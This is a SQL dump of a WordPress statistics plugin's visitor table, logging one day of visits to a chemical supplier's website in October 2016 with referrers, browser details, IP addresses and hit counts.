INSERT INTO `wp_statistics_visitor` VALUES (8011, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.255.121.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8012, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.3.18.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8013, '2016-10-20', 'https://www.bing.com/search?q=vazo+52+solubility&src=IE-SearchBox&FORM=IENTTR&conversationid=&adlt=strict', 'MSIE', 'Windows', '11.0', '', '148.141.31.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8014, '2016-10-20', 'https://www.google.ca/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '70.50.233.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8015, '2016-10-20', 'https://www.google.com.br/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=6&ved=0ahUKEwj654ev-unPAhUDRyYKHWXFCzcQFgg1MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-472s%2F&usg=AFQjCNFp7MGF66itSnbFjplfWyTba7J3_Q', 'MSIE', 'Windows', '10.0', '', '200.174.129.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8016, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8017, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.255.87.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8018, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.82.212.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8019, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.211.106.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8020, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.251.45.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8021, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.212.124.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8022, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.250.118.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8023, '2016-10-20', 'https://www.google.ca/', 'Chrome', 'Windows', '50.0.2661.94', '', '66.46.94.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8024, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.166.198.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8025, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.216.87.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8026, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.96.83.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8027, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.1.70.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8028, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.223.115.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8029, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.59.109.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8030, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.87.107.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8031, '2016-10-20', 'https://www.bing.com/search?q=miller+stephenson+chemical&src=IE-SearchBox&FORM=IENTSR', 'MSIE', 'Windows', '11.0', '', '24.52.64.146', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8032, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '104.9.172.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8033, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.17.21.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8034, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.139.133.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8035, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.31.203.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8036, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.232.223.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8037, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.3.128.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8038, '2016-10-20', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDMQFjAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F%3Fgclid%3DCIKPg-Xy6c8CFQyHfgoddhkCUg&ei=SQcJWMu8GKrnoQb-SQ&usg=AFQjCNEG97E7GEox0Kah6cD2_CkhB0a-sQ', 'MSIE', 'Windows', '11.0', '', '66.249.88.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8039, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '27.153.220.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8040, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.159.99.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8041, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.226.86.25', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8042, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.161.21.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8043, '2016-10-20', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '198.12.99.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8044, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.171.171.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8045, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.68.76.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8046, '2016-10-20', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '8.0', '', '62.24.222.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8047, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.95.207.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8048, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.215.56.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8049, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.91.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8050, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.242.119.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8051, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.64.151.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8052, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.00', '', '194.44.138.19', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8053, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.44.138.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8054, '2016-10-20', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.252.107.140', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8055, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.106.170.251', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8056, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.200.85.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8057, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.196.193.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8058, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.171.125.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8059, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.101.191.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8060, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.231.24.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8061, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.243.23.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8062, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.77.16.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8063, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.47.135.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8064, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.159.168.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8065, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '135.84.223.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8066, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.160.16.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8067, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.77.22.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8068, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.158.103.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8069, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.232.131.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8070, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.120.180.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8071, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.250.132.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8072, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '207.91.143.34', '000', 59, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8073, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.79.110.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8074, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.138.191.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8075, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.226.184.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8076, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.0.28.38', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8077, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.215.89.97', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8078, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.199.65.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8079, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.240.163.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8080, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.224.224.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8081, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.98.255.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8082, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '67.201.11.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8083, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.119.120.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8084, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '68.15.38.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8085, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.179.204.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8086, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.177.56.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8087, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '71.14.53.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8088, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.1.202.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8089, '2016-10-20', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8090, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.216.9.141', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8091, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.212.47.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8092, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.109.111.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8093, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '88.79.198.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8094, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.230.122.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8095, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '174.205.25.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8096, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.88.100.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8097, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.132.217.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8098, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.41.203.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8099, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.111.187.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8100, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.177.50.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8101, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.67.59.49', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8102, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.180.34.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8103, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.40.233.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8104, '2016-10-20', 'https://www.bing.com/search?q=krytox+thread+sealant&form=CMDTDF&pc=CMDTDF&src=IE-SearchBox', 'MSIE', 'Windows', '11.0', '', '24.51.36.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8105, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.240.212.98', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8106, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.27.161.49', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8107, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.62.85.2', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8108, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.68.110.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8109, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.14.185.123', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8110, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.113.54.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8111, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.103.87.219', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8112, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.229.150.171', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8113, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.180.209.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8114, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.217.38.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8115, '2016-10-20', 'https://dengi-pod-zalog-nedvizhimosti.ru/', 'MSIE', 'Windows', '6.0', '', '37.115.187.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8116, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.234.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8117, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.107.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8118, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '113.140.17.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8119, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8120, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.241.12.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8121, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.151.77.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8122, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwit5JjfgurPAhUIL2kKHTSOCDoYABAF&sig=AOD64_3rI8I8wwJRHhawHefL84rGOs3fUw&rct=j&q=&ved=0ahUKEwiIvZLfgurPAhXBdD4KHePhB5YQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '192.168.38.134', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8123, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.113.112.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8124, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.99', '', '107.183.34.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8125, '2016-10-20', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '107.183.34.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8126, '2016-10-20', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '107.183.34.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8127, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.52.123.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8128, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.38.233.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8129, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.102.12.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8130, '2016-10-20', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '75.139.6.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8131, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.239.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8132, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.131.141.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8133, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.170.195.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8134, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.63.241.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8135, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.252.32.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8136, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.238.71.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8137, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.224.53.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8138, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.53.193.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8139, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.64.245.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8140, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.39.251.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8141, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.72.5.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8142, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '160.178.160.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8143, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.102.118.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8144, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.105.58.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8145, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.95.249.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8146, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.104.230.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8147, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '194.247.204.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8148, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '5.0.2', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8149, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.43.161.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8150, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8151, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.65.18.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8152, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.222.27.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8153, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.3.247.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8154, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.59.253.144', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8155, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.134.90.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8156, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.156.30.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8157, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.65.60.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8158, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.187.145.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8159, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.114.146.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8160, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.101.126.127', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8161, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.35.1.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8162, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.94.91.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8163, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.82.67.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8164, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.58.74.198', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8165, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.196.137.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8166, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.216.170.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8167, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.254.73.33', '000', 3, 0); 
